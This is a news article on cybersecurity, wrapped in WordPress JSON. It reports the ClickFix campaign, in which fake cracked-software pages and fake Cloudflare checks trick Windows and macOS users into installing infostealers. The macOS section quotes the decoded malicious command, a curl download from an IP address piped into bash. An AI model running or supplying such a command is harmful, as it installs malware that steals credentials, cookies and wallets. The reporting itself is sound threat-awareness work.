{"id":8445,"date":"2025-11-14T10:03:39","date_gmt":"2025-11-14T10:03:39","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/11\/14\/new-clickfix-attack-targeting-windows-and-macos-users-to-deploy-infostealer-malware\/"},"modified":"2025-11-14T10:03:39","modified_gmt":"2025-11-14T10:03:39","slug":"new-clickfix-attack-targeting-windows-and-macos-users-to-deploy-infostealer-malware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/11\/14\/new-clickfix-attack-targeting-windows-and-macos-users-to-deploy-infostealer-malware\/","title":{"rendered":"New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware"},"content":{"rendered":"<p>    New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A growing social engineering technique called ClickFix has emerged as one of the most successful methods for distributing malware in recent months.<\/p>\n<p>This attack tricks users into copying and running commands directly into their operating systems command line interface, ultimately installing dangerous information-stealing software.<\/p>\n<p>The technique has proven remarkably effective because it bypasses traditional email security solutions and operates within browser sandboxes where most security tools cannot detect the malicious activity.<\/p>\n<p>The attack typically begins when users search for cracked software through search engines. Cybercriminals create <a href=\"https:\/\/cybersecuritynews.com\/hackers-poison-google-paid-ads-with-fake-tesla-websites\/\" target=\"_blank\" rel=\"noreferrer noopener\">fake landing pages<\/a> hosted on trusted platforms like Google Colab, Drive, Sites, and Groups to avoid being blocked by security systems.<\/p>\n<p>These pages act as initial contact points that redirect victims based on their operating system. Windows users receive the ACR stealer, while macOS users are redirected to pages that deploy the Odyssey infostealer.<\/p>\n<p>Intel471 security researchers <a href=\"https:\/\/www.intel471.com\/blog\/clickfix-tricking-users-into-installing-infostealers\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> this campaign in June 2025 during proactive malware hunting operations.<\/p>\n<p>The investigation revealed that threat actors were successfully targeting both major operating systems through a single infrastructure.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEizoMKU-I_raDIpL2COrNgWD2tmHfHuY_TGIPPIl96FdVTlGaCextJvDCcH39CfwWRr9qlvfY-BMMSiAZAB4l5gAEmJbOt41iubmnSdH8UpWeg2DU68Z9OBAI34QtKxcy2iKhVoeLVfR8djZ-YTuf7kF-pe1nhN8AGZx1ebDpJNFJtz8nxSaEZKqTcBHqg\/s16000\/Infection%2520chain%2520%28Source%2520-%2520Intel471%29.webp?ssl=1\" alt=\"Infection chain (Source - Intel471)\"><figcaption class=\"wp-element-caption\">Infection chain (Source \u2013 Intel471)<\/figcaption><\/figure>\n<\/div>\n<p>What makes this attack particularly concerning is its fileless execution. When victims paste the commands, malicious payloads are pulled directly into memory, making them invisible to traditional security software.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism-and-technical-execution\"><strong>Infection Mechanism and Technical Execution<\/strong><\/h2>\n<p>For Windows users, the attack chain guides victims through several redirection points before reaching a MEGA file hosting page containing a password-protected ZIP archive.<\/p>\n<p>Inside this archive sits the ACR stealer disguised as setup.exe. The <a href=\"https:\/\/cybersecuritynews.com\/chatgpt-powered-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">malware<\/a> not only steals credentials and personal data but also serves as a loader, installing additional threats such as SharkClipper, a cryptocurrency clipboard hijacker.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjvXNADbRqcv8Io4spCYGE_73NZ7mFNuCDAJAjE-m82Syw33t9qf8_mLNLuEyFHSn4V2f3jTrlJO0qysb-8GMqrrEUF1fz2jQ2I4WKp7I5zWl2zsBSjA3XSXSA9_IvxjcRCAFWcz1sEXgrzufQlvn_YyCJGLnd0Nixsk6YWvbyO-AhMFLJDmZ_t1FTMcmE\/s16000\/Fake%2520Cloudflare%2520security%2520check%2520which%2520prompts%2520users%2520to%2520run%2520a%2520ClickFix%2520command%2520%28Source%2520-%2520Intel471%29.webp?ssl=1\" alt=\"Fake Cloudflare security check which prompts users to run a ClickFix command (Source - Intel471)\"><figcaption class=\"wp-element-caption\">Fake Cloudflare security check which prompts users to run a ClickFix command (Source \u2013 Intel471)<\/figcaption><\/figure>\n<\/div>\n<p>MacOS users encounter a different approach that involves a fake <a href=\"https:\/\/cybersecuritynews.com\/new-clickfix-attack-exploits-fake-cloudflare-human-check\/\" target=\"_blank\" rel=\"noreferrer noopener\">Cloudflare<\/a> security check page. When users attempt to copy what appears to be a verification string, they actually copy a Base64-encoded shell command.<\/p>\n<p>Once decoded, this command executes:-<\/p>\n<pre class=\"wp-block-code\"><code>curl - s http:\/\/45.135.232.33\/droberto39774 | nohup bash<\/code><\/pre>\n<p>This command silently downloads and runs the Odyssey stealer, which harvests passwords, cookies, <a href=\"https:\/\/cybersecuritynews.com\/cryptocore-cryptocurrency-scam-draining-wallets\/\">cryptocurrency wallets<\/a>, Apple Notes, Keychain entries, and system data, then compresses everything into out.zip for exfiltration.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 92%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/new-clickfix-attack-targeting-windows-and-macos-users\/\">New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/new-clickfix-attack-targeting-windows-and-macos-users\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware A growing social engineering technique called ClickFix has emerged as one of the most successful methods for distributing malware in recent months. This attack tricks users into copying and running commands directly into their operating systems command line interface, ultimately installing dangerous information-stealing [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-8445","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/8445"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=8445"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/8445\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=8445"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=8445"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=8445"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}